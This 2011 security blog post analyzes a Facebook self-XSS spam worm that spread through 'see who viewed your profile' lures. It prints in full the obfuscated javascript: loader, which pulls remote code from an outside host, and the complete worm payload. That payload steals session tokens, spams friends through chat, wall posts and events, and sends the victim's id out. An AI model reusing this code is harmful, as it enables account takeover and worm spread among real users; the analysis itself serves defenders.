Facebook Spam

I saw many people posting this content on my wall, so I decided to analyze it. The link being spread is www.stump.ws/rdgct7s. Opened outside a logged-in Facebook session, this link resolves to www.1119999977u7.info, which in turn redirects to www.2220000099x9.info. That page looks like this:

facebook_spam

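Step 1 on the page tells the visitor to copy a piece of JavaScript: "Just Click In the Box to Highlight All Then Press Ctrl+C". The `javascript:` prefix indicates the snippet is meant to be run from the browser's address bar, where it executes in the context of whatever page is open at that moment, presumably a logged-in Facebook tab (the later steps are not reproduced here). Here is the JavaScript in question: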

 /* Loader snippet exactly as shown on the lure page (sample under analysis).
  * The hex-escaped array decodes to: "src", "script", "createElement",
  * "//2220000099x9.info/e.js", "appendChild", "body".
  * It creates a <script> element, sets its src to the remote e.js and appends it
  * to document.body, so the remote file is loaded into the page the snippet is
  * run in. The trailing void (0) makes the javascript: URL evaluate to undefined. */
 javascript: var _0xb533=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x2F\x2F\x32\x32\x32\x30\x30\x30\x30\x30\x39\x39\x78\x39\x2E\x69\x6E\x66\x6F\x2F\x65\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0xb533[2]](_0xb533[1]))[_0xb533[0]]=_0xb533[3];b[_0xb533[5]][_0xb533[4]](a); void (0); 

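Decoded, the script above creates a <script> element whose source is 2220000099x9.info/e.js and appends it to the body of the current page, so the remote file is loaded into that page. The file at this URL is JavaScript obfuscated with a large array of hex-escaped strings and renamed variables, as shown here: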

 var _0x4f0b=["\x48\x65\x79\x20\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25\x20\x20\x49\x20\x6A\x75\x73\x74\x20\x66\x6F\x75\x6E\x64\x20\x6F\x75\x74\x20\x79\x6F\x75\x20\x77\x65\x72\x65\x20\x6F\x6E\x65\x20\x6F\x66\x20\x6D\x79\x20\x74\x6F\x70\x20\x73\x74\x61\x6C\x6B\x65\x72\x73\x2C\x20\x79\x6F\x75\x20\x63\x61\x6E\x20\x66\x69\x6E\x64\x20\x79\x6F\x75\x72\x73\x20\x61\x74\x20\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x67\x72\x64\x35\x6B\x61","\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x0A\x77\x74\x66\x20\x67\x75\x79\x73\x2C\x20\x79\x6F\x75\x20\x61\x70\x70\x65\x61\x72\x65\x64\x20\x61\x73\x20\x74\x68\x65\x20\x70\x65\x6F\x70\x6C\x65\x20\x77\x68\x6F\x20\x73\x74\x61\x6C\x6B\x65\x64\x20\x6D\x65\x20\x74\x68\x65\x20\x6D\x6F\x73\x74\x2C\x20\x79\x6F\x75\x20\x63\x61\x6E\x20\x73\x65\x65\x20\x79\x6F\x75\x72\x73\x20\x61\x74\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x67\x72\x64\x35\x6B\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x32\x32\x32\x30\x30\x30\x30\x30\x39\x39\x78\x39\x2E\x69\x6E\x66\x6F\x2F\x65\x6E\x64\x2E\x70\x68\x70","\x79\x6F\x20\x2C\x20\x49\x20\x6C\x65\x61\x72\x6E\x65\x64\x20\x61\x20\x77\x61\x79\x20\x74\x6F\x20\x76\x69\x65\x77\x20\x77\x68\x6F\x20\x76\x69\x65\x77\x73\x20\x79\x6F\x75\x72\x20\x70\x72\x6F\x66\x69\x6C\x65\x0A\x0A\x46\x6F\x6C\x6C\x6F\x77\x20\x74\x68\x65\x73\x65\x20\x65\x61\x73\x79\x20\x73\x74\x65\x70\x73\x20\x74\x6F\x20\x66\x69\x6E\x64\x20\x6F\x75\x74\x3A\x0A\x0A\x61\x6C\x6C\x20\x79\x6F\x75\x20\x68\x61\x76\x65\x20\x74\x6F\x20\x64\x6F\x20\x69\x73\x20\x67\x6F\x20\x74\x6F\x20\x74\x68\x69\x73\x20\x6C\x69\x6E\x6B\x20\x61\x6E\x64\x20\x66\x6F\x6C\x6C\x6F\x77\x20\x74\x68\x65\x20\x64\x69\x72\x65\x63\x74\x69\x6F\x6E\x73\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x67\x72\x64\x35\x6B\x61","\x53\x65\x65\x20\x57\x68\x6F\x20\x48\x61\x73\x20\x56\x69\x65\x77\x65\x64\x20\x59\x6F\x75\x72\x20\x50\x72\x6F\x66\x69\x6C\x65\x21","\x
59\x6F\x75\x20\x73\x68\x6F\x75\x6C\x64\x20\x72\x65\x61\x6C\x6C\x79\x20\x63\x68\x65\x63\x6B\x20\x74\x68\x69\x73\x20\x6F\x75\x74\x2E\x20\x49\x74\x20\x72\x65\x61\x6C\x6C\x79\x20\x77\x6F\x72\x6B\x73\x21","\x54\x68\x69\x73\x20\x69\x73\x20\x74\x68\x65\x20\x6E\x65\x77\x20\x63\x6F\x64\x65\x20\x74\x68\x61\x74\x20\x65\x76\x65\x72\x79\x6F\x6E\x65\x20\x68\x61\x73\x20\x62\x65\x65\x6E\x20\x74\x61\x6C\x6B\x69\x6E\x67\x20\x61\x62\x6F\x75\x74\x21","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x6F\x70","\x47\x45\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x73\x65\x6E\x64","\x2F","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x40\x5B","\x69\x64","\x3A","\x6E\x61\x6D\x65","\x5D","","\x26","\x3D","\x50\x4F\x53\x54","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x62\x6C\x6F\x63\x6B","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x61\x62\x73\x6F\x6C\x75\x74\x65","\x77\x69\x64\x74\x68","\x25","\x68\x65\x69\x67\x68\x74","\x6C\x65\x66\x74","\x70\x78","\x74\x65\x78\x74\x41\x6C\x69\x67\x6E","\x63\x65\x6E\x74\x65\x72","\x70\x61\x64\x64\x69\x6E\x67","\x34\x70\x78","\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64","\x23\x46\x46\x46\x46\x46\x46","\x7A\x49\x6E\x64\x65\x78","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x26\x6E\x62\x73\x70\x3B\x3C\x62\x72\x2F\x3E\x50\x6C\x65\x61\x73\x65\x20\x77\x61\x69\x74\x2C\x20\x74\x68\x69\x73\x20\x63\x61\x6E\x20\x74\x61\x6B\x65\x20\x61\x20\x6C\x69\x74\x74\x6C\x65\x20\x77\x68\x69\x6C\x65\x2E\x2E\x2E\x3C\x62\x72\x2F\x3E\x3C\x62\x72\x2F\x3E\x4F\x72\x20\x69\x66\x20\x79\
x6F\x75\x20\x67\x65\x74\x20\x73\x69\x63\x6B\x20\x6F\x66\x20\x77\x61\x69\x74\x69\x6E\x67\x2C\x20\x79\x6F\x75\x20\x63\x61\x6E\x20\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x76\x6F\x69\x64\x28\x30\x29\x3B\x22\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x77\x66\x3D\x30\x3B\x20\x6D\x66\x28\x29\x3B\x22\x3E\x63\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E\x20\x28\x72\x65\x73\x75\x6C\x74\x73\x20\x6D\x61\x79\x20\x62\x65\x20\x6C\x65\x73\x73\x20\x61\x63\x63\x75\x72\x61\x74\x65\x29","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x64\x61\x74\x61","\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64","\x6E\x61\x76\x41\x63\x63\x6F\x75\x6E\x74\x4E\x61\x6D\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3F","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x6F\x6F\x73\x65\x2F\x3F\x5F\x5F\x61\x3D\x31","\x65\x76\x65\x6E\x74","\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31\x26\x76\x69\x65\x77\x65\x72\x3D","\x26\x74\x6F\x6B\x65\x6E\x3D","\x26\x66\x69\x6C\x74\x65\x72\x5B\x30\x5D\x3D\x75\x73\x65\x72\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x30\x5D\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x79\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x31\x5D\x3D\x6E\x6D\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x32\x5D\x3D\x73\x6F\x72\x74\x5F\x61\x6C\x70\x68\x61","\x6C\x65\x6E\x67\x74\x68","\x70\x75\x73\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x67\x65\x74\x4D\x6F\x6E\x74\x68","\x67\x65\x74\x44\x61\x74\x65","\x67\x65\x74\x46\x75\x6C\x6C\x59\x65\x61\x72","\x67\x65\x74\x48\x6F\x75\x72\x73","\x2C","\x6A\x6F\x69\x6E","\x6F\x6E","\x43\x72\x65\x61\x74\x65\x20\x45\x76\x65\x6E\x74","\x6E\x65\x77","\x2F\x65\x76\x65\x6E\x74\x73\x2F\x63\x72\x65\x61\x74\x65\x2E\x70\x68\x70","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\
x31","\x73\x75\x62\x73\x74\x72","\x28","\x29","\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74","\x70\x61\x79\x6C\x6F\x61\x64","\x6E\x6F\x77\x41\x76\x61\x69\x6C\x61\x62\x6C\x65\x4C\x69\x73\x74","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x66\x69\x72\x73\x74\x4E\x61\x6D\x65","\x75\x73\x65\x72\x49\x6E\x66\x6F\x73","\x72\x65\x70\x6C\x61\x63\x65","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x73\x65\x6E\x64\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x3F\x75\x69\x64\x3D","\x26\x66\x69\x6C\x74\x65\x72\x3D\x61\x6C\x6C\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x73\x68\x69\x66\x74","\x66\x65\x74\x63\x68\x65\x64\x20\x66\x72\x69\x65\x6E\x64\x73\x3A\x20","\x68\x6F\x6D\x65","\x70\x6F\x70","\x25\x74\x66\x25","\x73\x65\x61\x72\x63\x68","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65","\x6D\x65\x73\x73\x61\x67\x65\x20\x74\x65\x78\x74\x3A\x20","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x64\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x72\x6F\x66\x69\x6C\x65"];var chatmessage=_0x4f0b[0];var postmessage=_0x4f0b[1];var redirect=_0x4f0b[2];var eventdesc=_0x4f0b[3];var eventname=_0x4f0b[4];var nfriends=5000;var eventmsg=_0x4f0b[5];var eventpmsubj=_0x4f0b[6];var 
_0xe26a=[_0x4f0b[7],_0x4f0b[8],_0x4f0b[9],_0x4f0b[10],_0x4f0b[11],_0x4f0b[12],_0x4f0b[13],_0x4f0b[14],_0x4f0b[15],_0x4f0b[16],_0x4f0b[17],_0x4f0b[18],_0x4f0b[19],_0x4f0b[20],_0x4f0b[21],_0x4f0b[22],_0x4f0b[23],_0x4f0b[24],_0x4f0b[25],_0x4f0b[26],_0x4f0b[27],_0x4f0b[28],_0x4f0b[29],_0x4f0b[30],_0x4f0b[31],_0x4f0b[32],_0x4f0b[33],_0x4f0b[34],_0x4f0b[35],_0x4f0b[36],_0x4f0b[37],_0x4f0b[38],_0x4f0b[39],_0x4f0b[40],_0x4f0b[41],_0x4f0b[42],_0x4f0b[43],_0x4f0b[44],_0x4f0b[45],_0x4f0b[46],_0x4f0b[47],_0x4f0b[48],_0x4f0b[49],_0x4f0b[50],_0x4f0b[51],_0x4f0b[52],_0x4f0b[53],_0x4f0b[54],_0x4f0b[55],_0x4f0b[56],_0x4f0b[57],_0x4f0b[58],_0x4f0b[59],_0x4f0b[60],_0x4f0b[61],_0x4f0b[62],_0x4f0b[63],_0x4f0b[64],_0x4f0b[65],_0x4f0b[66],_0x4f0b[67],_0x4f0b[68],_0x4f0b[69],_0x4f0b[70],_0x4f0b[71],_0x4f0b[72],_0x4f0b[73],_0x4f0b[74],_0x4f0b[75],_0x4f0b[76],_0x4f0b[77],_0x4f0b[78],_0x4f0b[79],_0x4f0b[80],_0x4f0b[81],_0x4f0b[82],_0x4f0b[83],_0x4f0b[84],_0x4f0b[85],_0x4f0b[86],_0x4f0b[87],_0x4f0b[88],_0x4f0b[89],_0x4f0b[90],_0x4f0b[91],_0x4f0b[92],_0x4f0b[93],_0x4f0b[94],_0x4f0b[95],_0x4f0b[96],_0x4f0b[97],_0x4f0b[98],_0x4f0b[99],_0x4f0b[100],_0x4f0b[101],_0x4f0b[102],_0x4f0b[103],_0x4f0b[104],_0x4f0b[105],_0x4f0b[106],_0x4f0b[107]];var debug=false;var wf=0;var mf=function (){if(wf<=0){setTimeout(function (){window[_0xe26a[2]][_0xe26a[1]][_0xe26a[0]]=redirect;} ,500);} ;} ;var doget=function (_0x43aaxe,_0x43aaxf,_0x43aax10){var _0x43aax11= new XMLHttpRequest();_0x43aax11[_0xe26a[4]](_0xe26a[3],_0x43aaxe);_0x43aax11[_0xe26a[5]]=function (){if(_0x43aax11[_0xe26a[6]]==4){if(_0x43aax11[_0xe26a[7]]==200&&_0x43aaxf){_0x43aaxf(_0x43aax11[_0xe26a[8]]);} ;if(_0x43aax10){_0x43aax10();} ;} ;} ;_0x43aax11[_0xe26a[9]]();} ;doget(_0xe26a[10],function (_0x43aax12){var _0x43aax13=document[_0xe26a[12]][_0xe26a[11]](/c_user=(\d+)/)[1];var _0x43aax14=function (_0x43aax15){return _0x43aax15?_0xe26a[13]+_0x43aax15[_0xe26a[14]]+_0xe26a[15]+_0x43aax15[_0xe26a[16]]+_0xe26a[17]:_0xe26a[18];} ;var 
_0x43aax16=function (_0x43aax15){return _0x43aax15?_0x43aax15[_0xe26a[16]]:_0xe26a[18];} ;var _0x43aax17=function (_0x43aax15){out=_0xe26a[18];for(var _0x43aax18 in _0x43aax15){out+=(out?_0xe26a[19]:_0xe26a[18])+_0x43aax18+((_0x43aax15[_0x43aax18]!==null)?_0xe26a[20]+encodeURIComponent(_0x43aax15[_0x43aax18]):_0xe26a[18]);} ;return out;} ;var _0x43aax19=function (_0x43aaxe,_0x43aax15,_0x43aaxf,_0x43aax10){var _0x43aax11= new XMLHttpRequest();_0x43aax11[_0xe26a[4]](_0xe26a[21],_0x43aaxe);_0x43aax11[_0xe26a[24]](_0xe26a[22],_0xe26a[23]);_0x43aax11[_0xe26a[5]]=function (){if(_0x43aax11[_0xe26a[6]]==4){if(_0x43aax11[_0xe26a[7]]==200&&_0x43aaxf){_0x43aaxf(_0x43aax11[_0xe26a[8]]);} ;if(_0x43aax10){_0x43aax10();} ;} ;} ;_0x43aax11[_0xe26a[9]](_0x43aax17(_0x43aax15));} ;var _0x43aax1a=function (){var _0x43aax1b=document[_0xe26a[26]](_0xe26a[25]);_0x43aax1b[_0xe26a[28]][_0xe26a[27]]=_0xe26a[29];_0x43aax1b[_0xe26a[28]][_0xe26a[30]]=_0xe26a[31];_0x43aax1b[_0xe26a[28]][_0xe26a[32]]=100+_0xe26a[33];_0x43aax1b[_0xe26a[28]][_0xe26a[34]]=100+_0xe26a[33];_0x43aax1b[_0xe26a[28]][_0xe26a[35]]=0+_0xe26a[36];_0x43aax1b[_0xe26a[28]][_0xe26a[2]]=0+_0xe26a[36];_0x43aax1b[_0xe26a[28]][_0xe26a[37]]=_0xe26a[38];_0x43aax1b[_0xe26a[28]][_0xe26a[39]]=_0xe26a[40];_0x43aax1b[_0xe26a[28]][_0xe26a[41]]=_0xe26a[42];_0x43aax1b[_0xe26a[28]][_0xe26a[43]]=999999;_0x43aax1b[_0xe26a[44]]=_0xe26a[45];document[_0xe26a[47]][_0xe26a[46]](_0x43aax1b);} ;var _0x43aax1c=_0x43aax12[_0xe26a[11]](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i)[1];var _0x43aax1d=_0x43aax12[_0xe26a[11]](/name="post_form_id" value="([\d\w]+)"/i)[1];var _0x43aax1e=_0x43aax12[_0xe26a[11]](/name="fb_dtsg" value="([\d\w]+)"/i)[1];var 
_0x43aax1f=document[_0xe26a[51]](_0xe26a[50])[_0xe26a[49]][_0xe26a[48]];redirect=redirect+_0xe26a[52]+_0x43aax17({userid:_0x43aax13,name:_0x43aax1f,doclose:1});_0x43aax1a();if(eventdesc){wf++;_0x43aax19(_0xe26a[53],{type:_0xe26a[54],eid:null,invite_message:_0xe26a[18],__d:1,post_form_id:_0x43aax1d,fb_dtsg:_0x43aax1e,lsd:null,post_form_id_source:_0xe26a[55]},function (_0x43aax20){var _0x43aax21=_0x43aax20[_0xe26a[11]](/\\"token\\":\\"([^\\]+)\\"/)[1];var _0x43aaxe=_0xe26a[56]+_0x43aax13+_0xe26a[57]+_0x43aax21+_0xe26a[58];doget(_0x43aaxe,function (_0x43aax22){var _0x43aax23=_0x43aax22[_0xe26a[11]](/\{"uid":\d+,/g);var _0x43aax24=[];for(var _0x43aax25=0;_0x43aax25<_0x43aax23[_0xe26a[59]];_0x43aax25++){var _0x43aax26=_0x43aax23[_0x43aax25][_0xe26a[11]](/:(\d+),/)[1];if(_0x43aax26!=_0x43aax13){_0x43aax24[_0xe26a[60]](_0x43aax26);} ;} ;var _0x43aax27= new Date();_0x43aax27[_0xe26a[62]](_0x43aax27[_0xe26a[61]]()+60*60*24*1000);datestr=(_0x43aax27[_0xe26a[63]]()+1)+_0xe26a[10]+_0x43aax27[_0xe26a[64]]()+_0xe26a[10]+_0x43aax27[_0xe26a[65]]();timestr=_0x43aax27[_0xe26a[66]]()*60;var _0x43aax28={post_form_id:_0x43aax1d,fb_dtsg:_0x43aax1e,start_time_intl_field:datestr,start_time_text_field:datestr,start_time_hour_min:timestr,name:eventname,place_page_id:_0xe26a[18],location:_0xe26a[18],street:_0xe26a[18],geo_id:_0xe26a[18],geo_sq:_0xe26a[18],desc:eventdesc,sgb_invitees:_0x43aax24[_0xe26a[68]](_0xe26a[67]),sgb_emails:_0xe26a[18],sgb_message:_0xe26a[18],privacy_type:_0xe26a[69],guest_list:_0xe26a[69],connections_can_post:_0xe26a[69],save:_0xe26a[70],submitting:_0xe26a[18]};_0x43aax28[_0xe26a[71]]=_0xe26a[18];_0x43aax19(_0xe26a[72],_0x43aax28,false,function (){mf(--wf);} );} );} );} ;if(chatmessage){wf++;_0x43aax19(_0xe26a[73],{user:_0x43aax13,post_form_id:_0x43aax1d,fb_dtsg:_0x43aax1e,lsd:null,post_form_id_source:_0xe26a[55],popped_out:false,force_render:true},function (_0x43aax20){var _0x43aax29=_0x43aax20[_0xe26a[74]](9);var 
_0x43aax2a=eval(_0xe26a[75]+_0x43aax29+_0xe26a[76]);var _0x43aax2b=_0x43aax2a[_0xe26a[78]][_0xe26a[77]];for(var _0x43aax2c in _0x43aax2b[_0xe26a[79]]){var _0x43aax2d=Math[_0xe26a[81]](Math[_0xe26a[80]]()*1335448958);var _0x43aax2e=( new Date())[_0xe26a[61]]();var _0x43aax2f=chatmessage[_0xe26a[86]](_0xe26a[82],_0x43aax2b[_0xe26a[85]][_0x43aax2c][_0xe26a[84]][_0xe26a[83]]());_0x43aax19(_0xe26a[87],{msg_id:Math[_0xe26a[81]](Math[_0xe26a[80]]()*1335448958),client_time:( new Date())[_0xe26a[61]](),msg_text:chatmessage[_0xe26a[86]](_0xe26a[82],_0x43aax2b[_0xe26a[85]][_0x43aax2c][_0xe26a[84]][_0xe26a[83]]()),to:_0x43aax2c,post_form_id:_0x43aax1d,fb_dtsg:_0x43aax1e,post_form_id_source:_0xe26a[55]});} ;mf(--wf);} );} ;if(postmessage){wf++;doget(_0xe26a[88]+_0x43aax13+_0xe26a[89],function (_0x43aax20){var _0x43aax23=_0x43aax20[_0xe26a[11]](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);var _0x43aax30=[];for(var _0x43aax25=0;_0x43aax25<_0x43aax23[_0xe26a[59]];_0x43aax25++){var _0x43aax26=_0x43aax23[_0x43aax25][_0xe26a[11]](/_\d+_/)[0][_0xe26a[86]](/_/g,_0xe26a[18]);var _0x43aax31=_0x43aax23[_0x43aax25][_0xe26a[11]](/>[^>]+\\u003c\\\/a>$/i)[0][_0xe26a[86]](/\\u003c\\\/a>$/gim,_0xe26a[18])[_0xe26a[86]](/>/g,_0xe26a[18]);_0x43aax30[_0xe26a[60]]({id:_0x43aax26,name:_0x43aax31});} ;var _0x43aax10=[];var _0x43aax32=[];while(_0x43aax30[_0xe26a[59]]){var _0x43aax33=Math[_0xe26a[81]](Math[_0xe26a[80]]()*_0x43aax30[_0xe26a[59]]);_0x43aax10[_0xe26a[60]](_0x43aax30[_0x43aax33]);_0x43aax32[_0xe26a[60]](_0x43aax30[_0x43aax33]);var _0x43aax2e=_0x43aax30[_0xe26a[90]]();if(_0x43aax33){_0x43aax30[_0x43aax33-1]=_0x43aax2e;} ;} ;if(debug){alert(_0xe26a[91]+_0x43aax10[_0xe26a[59]]);} ;var _0x43aax34={post_form_id:_0x43aax1d,fb_dtsg:_0x43aax1e,xhpc_composerid:_0x43aax1c,xhpc_targetid:_0x43aax13,xhpc_context:_0xe26a[92],xhpc_fbx:_0xe26a[18],lsd:null,post_form_id_source:_0xe26a[55]};mt=postmessage;m=postmessage;while(mt[_0xe26a[95]](_0xe26a[94])>=0){var 
_0x43aax35=_0x43aax10[_0xe26a[93]]();mt=mt[_0xe26a[86]](_0xe26a[94],_0x43aax16(_0x43aax35));m=m[_0xe26a[86]](_0xe26a[94],_0x43aax14(_0x43aax35));} ;_0x43aax34[_0xe26a[96]]=mt;_0x43aax34[_0xe26a[97]]=m;if(debug){alert(_0xe26a[98]+mt);} ;_0x43aax19(_0xe26a[99],_0x43aax34);var _0x43aax36=function (_0x43aax18){if(_0x43aax18==0){wf=0;mf();return ;} ;var _0x43aax37=_0x43aax32[_0xe26a[90]]();var _0x43aax38={post_form_id:_0x43aax1d,fb_dtsg:_0x43aax1e,xhpc_composerid:_0x43aax1c,xhpc_targetid:_0x43aax37[_0xe26a[14]],xhpc_context:_0xe26a[100],xhpc_fbx:1,lsd:null,post_form_id_source:_0xe26a[55]};var _0x43aax39=postmessage;var _0x43aax3a=postmessage;if(_0x43aax10[_0xe26a[59]]==0){wf=0;mf();return ;} ;while(_0x43aax39[_0xe26a[95]](_0xe26a[94])>=0){var _0x43aax3b=_0x43aax10[_0xe26a[93]]();_0x43aax39=_0x43aax39[_0xe26a[86]](_0xe26a[94],_0x43aax16(_0x43aax3b));_0x43aax3a=_0x43aax3a[_0xe26a[86]](_0xe26a[94],_0x43aax14(_0x43aax3b));} ;_0x43aax38[_0xe26a[96]]=_0x43aax39;_0x43aax38[_0xe26a[97]]=_0x43aax3a;_0x43aax19(_0xe26a[99],_0x43aax38);setTimeout(function (){_0x43aax36(_0x43aax18-1);} ,2000);} ;wf++;setTimeout(function (){_0x43aax36(nfriends);} ,2000);} );} ;mf();} ); 

The hex-escaped string array at the start of the file decodes to the following plain text:

 "Hey %firstname%  I just found out you were one of my top stalkers, you can find yours at  http://stump.ws/grd5ka","%tf% %tf% %tf% %tf% %tf% %tf% wtf guys, you appeared as the people who stalked me the most, you can see yours at http://stump.ws/grd5ka","http://www.2220000099x9.info/end.php","yo , I learned a way to view who views your profile  Follow these easy steps to find out:  all you have to do is go to this link and follow the directions http://stump.ws/grd5ka","See Who Has Viewed Your Profile!","You should really check this out. It really works!","This is the new code that everyone has been talking about!","href","location","top","GET","open","onreadystatechange","readyState","status","responseText","send","/","match","cookie","@[","id",":","name","]","","&","=","POST","Content-Type","application/x-www-form-urlencoded","setRequestHeader","div","createElement","display","style","block","position","absolute","width","%","height","left","px","textAlign","center","padding","4px","background","#FFFFFF","zIndex","innerHTML","&nbsp;<br/>Please wait, this can take a little while...<br/><br/>Or if you get sick of waiting, you can <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> (results may be less accurate)","appendChild","body","data","firstChild","navAccountName","getElementById","?","/ajax/choose/?__a=1","event","AsyncRequest","/ajax/typeahead/first_degree.php?__a=1&viewer=","&token=","&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha","length","push","getTime","setTime","getMonth","getDate","getFullYear","getHours",",","join","on","Create Event","new","/events/create.php","/ajax/chat/buddy_list.php?__a=1","substr","(",")","buddy_list","payload","nowAvailableList","random","floor","%firstname%","toLowerCase","firstName","userInfos","replace","/ajax/chat/send.php?__a=1","/ajax/browser/friends/?uid=","&filter=all&__a=1&__d=1","shift","fetched friends: 
","home","pop","%tf%","search","xhpc_message_text","xhpc_message","message text: ","/ajax/updatestatus.php?__a=1","profile" 

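This is how it spreads to other users: it messages the friends in your chat buddy list (code: /ajax/chat/buddy_list.php), posts messages on their walls from your profile, and updates your status (code: /ajax/updatestatus.php?__a=1). It also creates an event (code: /events/create.php) and invites the friends returned by the friend lookup whose query ends in &options[2]=sort_alpha. Because the script runs inside the Facebook page itself, it can read the c_user cookie and scrape the post_form_id and fb_dtsg form tokens from the home page, so every request it sends carries the victim's own session and anti-CSRF values.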

Apr 19th, 2011 | Filed in: Security | 1 comment | Trackback
Author: Rishi Narang
  1. neo
    May 24th, 2011 at 15:51 | #1

    Great!
